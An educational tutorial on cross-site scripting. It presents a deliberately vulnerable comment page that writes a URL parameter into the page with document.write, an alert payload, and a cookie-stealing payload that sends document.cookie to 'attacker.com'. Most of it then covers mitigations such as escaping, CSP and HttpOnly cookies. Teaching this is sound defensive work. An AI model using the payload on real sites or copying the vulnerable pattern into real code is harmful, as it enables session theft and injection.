
An example of how cybersecurity bad actors can compromise JavaScript code

Scenario: Exploiting an XSS Vulnerability in JavaScript

Vulnerable Code:

Imagine a web application where users can post comments. The submitted comment is rendered directly on the page without sanitizing or escaping the input.

<!DOCTYPE html>
<html>
<head>
    <title>Comment Section</title>
</head>
<body>
    <h1>Leave a Comment</h1>
    <form method="GET" action="/comments">
        <input type="text" name="comment" placeholder="Write your comment here">
        <button type="submit">Submit</button>
    </form>
    
    <h2>Comments:</h2>
    <div id="comments">
        <!-- Vulnerable rendering of user input: the raw 'comment' query parameter is written into the page as HTML -->
        <script>
            const urlParams = new URLSearchParams(window.location.search);
            const comment = urlParams.get('comment');
            if (comment) {
                document.write('<p>' + comment + '</p>');
            }
        </script>
    </div>
</body>
</html>

Attack Scenario:

1. Input a Malicious Payload: An attacker submits the following "comment":

html

<script>alert('Hacked!');</script>

2. Result: When the page reloads, the malicious script is executed in the victim's browser, displaying an alert box. In a real attack, this could be replaced with code to steal cookies, session tokens, or sensitive user data.

Consequences of the Attack:

1. Session Hijacking: Malicious scripts can read session cookies through:

javascript

document.cookie

Example payload:

html

<script> fetch('https://attacker.com/steal?cookie=' + document.cookie); </script>

2. Phishing or Defacement: An attacker might use JavaScript to modify the DOM and trick users into entering credentials into a fake login form.

3. Browser Exploits: Advanced attacks might leverage browser vulnerabilities to gain deeper access to the victim's machine.

How to Mitigate:

1. Escape User Input: Sanitize and escape special characters to prevent scripts from being executed. Use libraries like DOMPurify for sanitization.

Example:

javascript

// Escape '&' first so the entities produced by the later replacements are not escaped again
const safeComment = comment.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
document.write('<p>' + safeComment + '</p>'); // the comment now renders as literal text, not markup
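The replace chain above covers the text between the <p> tags. As an added example, not code from the original post, the function below is a complete HTML escaper in plain JavaScript that runs in Node.js without a browser; it also escapes both quote characters, so the same function is safe for quoted attribute values. The names escapeHtml and renderComment are assumptions, and the sample input is constructed from the page's own payload.

```javascript
// Added example (not from the original post): a complete HTML escaper for the
// text sink shown in the page. Escaping '&' together with the other characters
// in one pass means no entity produced here is ever escaped a second time.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Returns input with every HTML-significant character replaced by its entity.
// Non-string values are coerced so a number or null never bypasses escaping.
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Builds the same '<p>...</p>' markup the page writes, with the comment
// rendered as inert text. Quotes are escaped too, so the same escaper can be
// used when the value lands inside a double- or single-quoted attribute.
function renderComment(comment) {
  return '<p>' + escapeHtml(comment) + '</p>';
}

// Self-check with the payload from the attack scenario (constructed input).
const demo = renderComment("<script>alert('Hacked!');</script>");
console.log(demo); // <p>&lt;script&gt;alert(&#39;Hacked!&#39;);&lt;/script&gt;</p>
```

Escaping is context-specific: this function is correct for HTML text and quoted attribute contexts only. A value placed inside a JavaScript string, a URL, or a CSS rule needs the encoder for that context, and a value that must keep some HTML needs a sanitizer such as DOMPurify rather than an escaper.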


2. Use Content Security Policy (CSP): Add a Content-Security-Policy HTTP header to restrict script execution:

http

Content-Security-Policy: default-src 'self'; script-src 'self';

3. Avoid document.write: Use safer DOM manipulation methods like textContent or innerText to ensure no executable code is injected:

javascript

const p = document.createElement('p');
p.textContent = comment; // Safely adds text, no script execution
document.getElementById('comments').appendChild(p);

4. Validate Input on the Backend: Even if the front end escapes input, ensure the backend validates and sanitizes it before storing or rendering.

5. Use HTTP-Only Cookies: Prevent scripts from accessing session cookies by marking them as HttpOnly in the server's response headers:

http

Set-Cookie: session=abcd1234; HttpOnly; Secure
